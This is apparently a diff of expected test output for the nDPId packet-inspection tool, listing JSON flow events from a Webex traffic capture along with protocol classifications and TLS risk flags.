-00922{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1444570679512,"flow_last_seen":1444570680667,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2527,"flow_tot_l4_payload_len":5379,"flow_avg_l4_payload_len":233,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55669,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} -00922{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1444570693238,"flow_last_seen":1444570694561,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":5347,"flow_avg_l4_payload_len":243,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55671,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1444570732086,"flow_last_seen":1444570734115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51190,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00922{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1444570712008,"flow_last_seen":1444570716597,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":5347,"flow_avg_l4_payload_len":243,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55687,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} -00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570640382,"flow_last_seen":1444570699865,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33511,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00927{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1444570738415,"flow_last_seen":1444570742172,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":14319,"flow_tot_l4_payload_len":34572,"flow_avg_l4_payload_len":1440,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51194,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} -00578{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1444570640385,"flow_last_seen":1444570699915,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":980,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33512,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1444570738419,"flow_last_seen":1444570738426,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51195,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00921{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1444570636364,"flow_last_seen":1444570640403,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":6215,"flow_avg_l4_payload_len":345,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.98","src_port":37129,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} -00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1444570640310,"flow_last_seen":1444570645707,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.98","src_port":37139,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":21,"flow_first_seen":1444570699916,"flow_last_seen":1444570700460,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":1376,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33551,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1444570700561,"flow_last_seen":1444570713719,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":1375,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33553,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00578{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1444570700563,"flow_last_seen":1444570713710,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":980,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33554,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1444570713719,"flow_last_seen":1444570715293,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":1011,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33559,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00922{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1444570636170,"flow_last_seen":1444570639257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":7020,"flow_avg_l4_payload_len":501,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.153","src_port":57647,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} -00923{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1444570636252,"flow_last_seen":1444570640344,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2842,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":305,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.202.139","src_port":47116,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} -00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1444570640269,"flow_last_seen":1444570645699,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.202.139","src_port":47135,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00823{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1444570699074,"flow_last_seen":1444570740247,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":7928,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.241.32.14","src_port":46211,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00819{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":95,"flow_first_seen":1444570624853,"flow_last_seen":1444570630376,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17680,"flow_tot_l4_payload_len":87086,"flow_avg_l4_payload_len":916,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41346,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":56,"flow_first_seen":1444570627404,"flow_last_seen":1444570630162,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17966,"flow_tot_l4_payload_len":106652,"flow_avg_l4_payload_len":1904,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41348,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1444570628113,"flow_last_seen":1444570628619,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":399,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41350,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1444570628117,"flow_last_seen":1444570628568,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":399,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41351,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00922{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1444570631722,"flow_last_seen":1444570633204,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":8394,"flow_tot_l4_payload_len":24960,"flow_avg_l4_payload_len":960,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41354,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} -00923{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1444570633357,"flow_last_seen":1444570635974,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":8847,"flow_tot_l4_payload_len":40410,"flow_avg_l4_payload_len":1063,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41358,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} -00922{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1444570636387,"flow_last_seen":1444570640346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":7463,"flow_avg_l4_payload_len":439,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41386,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} -00576{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1444570640319,"flow_last_seen":1444570652361,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41394,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00922{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1444570672215,"flow_last_seen":1444570673280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":7463,"flow_avg_l4_payload_len":533,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41419,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1444570631058,"flow_last_seen":1444570631059,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.133.206.47","dst_ip":"107.20.242.44","src_port":59447,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1444570631058,"flow_last_seen":1444570631059,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.133.206.47","dst_ip":"107.20.242.44","src_port":59447,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00921{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1444570636255,"flow_last_seen":1444570639258,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2920,"flow_tot_l4_payload_len":7052,"flow_avg_l4_payload_len":414,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.4.76","src_port":52730,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00636{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1444570640346,"flow_last_seen":1444570640407,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.133.206.47","dst_ip":"80.74.110.68","src_port":33459,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1444570640346,"flow_last_seen":1444570640407,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.133.206.47","dst_ip":"80.74.110.68","src_port":33459,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00922{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1444570636248,"flow_last_seen":1444570639255,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2579,"flow_tot_l4_payload_len":7031,"flow_avg_l4_payload_len":413,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.104.140","src_port":44492,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1444570630272,"flow_last_seen":1444570630272,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.133.206.47","dst_ip":"185.63.147.10","src_port":54651,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1444570630272,"flow_last_seen":1444570630272,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.133.206.47","dst_ip":"185.63.147.10","src_port":54651,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00921{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1444570632436,"flow_last_seen":1444570633205,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2903,"flow_tot_l4_payload_len":4426,"flow_avg_l4_payload_len":316,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"23.44.253.243","src_port":49048,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00828{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1444570638225,"flow_last_seen":1444570642072,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3697,"flow_tot_l4_payload_len":5437,"flow_avg_l4_payload_len":319,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"216.58.208.40","src_port":43433,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} +00921{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1444570636359,"flow_last_seen":1444570639256,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2579,"flow_tot_l4_payload_len":6215,"flow_avg_l4_payload_len":388,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.97","src_port":51370,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 